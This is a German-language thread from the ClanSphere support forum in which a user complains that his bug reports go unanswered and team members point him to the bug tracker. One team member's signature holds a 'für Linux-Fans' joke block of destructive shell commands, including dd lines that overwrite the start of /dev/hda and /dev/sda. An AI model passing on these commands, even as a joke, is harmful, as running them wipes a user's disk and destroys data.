Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 3
Seite [1]
wutsin


King for a day




Herkunft: ulm
Beiträge: 325
# Thema - 14.10.2006 um 16:08 Uhr
http://www.clansphere.net/index.php?mod=board&action=thread&where=274

und dann der hier....

http://www.clansphere.net/index.php?mod=board&action=thread&where=170


ich finde es schade das net einer ma nen beitrag zu den beiden geschriebn hat... ( habe beides auch im bugtracker hier reingeschriebn
und da is au no nix... )

ich hoffe ihr schaut euch das wenigstes ma an...

DANKE


------------------


suche hilfe bei diesen problemen, wünschen zu CS07 mehr... +-
Inaktiv
sgraewe ClanSphere Team

Supporter
Supporter




Beiträge: 6116
# Antwort: 1 - 14.10.2006 um 16:43 Uhr
also könnte daran liegen das das erste kein bug ist -.-

du weist aber schon was bugs sind oder ?


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 2 - 14.10.2006 um 17:15 Uhr
Ich finde ob wir zurück schreiben oder nicht sollte ganz alleine dem jenigen überlassen sein.

Vielleicht kann es aber auch daran liegen dass man für 'Bugs' einen 'Bugtracker' hat.

Dort werden wir viel öffter reinsehen als das Forum nach Beiträgen zu durchforsten bei denen es um 'Bugs' geht.

Also wenn Du Fehler, Bugs etc findest dann melde die bitte darüber.

Es erleichtert uns die Arbeit denn aus diesem Grund wurde der 'Bugtracker' auch entwickelt.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Baumi


Try to beat me





Beiträge: 159
# Antwort: 3 - 14.10.2006 um 18:21 Uhr
Ich finde ob wir zurück schreiben oder nicht sollte ganz alleine dem jenigen überlassen sein.

Vielleicht kann es aber auch daran liegen dass man für 'Bugs' einen 'Bugtracker' hat.

Dort werden wir viel öffter reinsehen als das Forum nach Beiträgen zu durchforsten bei denen es um 'Bugs' geht.

Also wenn Du Fehler, Bugs etc findest dann melde die bitte darüber.

Es erleichtert uns die Arbeit denn aus diesem Grund wurde der 'Bugtracker' auch entwickelt.


Mhm, habe bereits am 03.10 einen Bug gepostet (Link) gepostet, doch bisweilen gab es leider noch keinerlei Regung, der entsprechende Bug wurde bis zum aktuellen Zeitpunkt leider nichteinmal anerkannt :(
Sogar eine enstprechende Lösung ist schon dabei ^^


------------------

Alles was das Herz begehrt: http://www.sentic.org

Counterstrike PublicServer: 80.190.77.75:27015

Inaktiv
|
Antworten: 3
Seite [1]


Sie müssen sich registrieren, um zu antworten.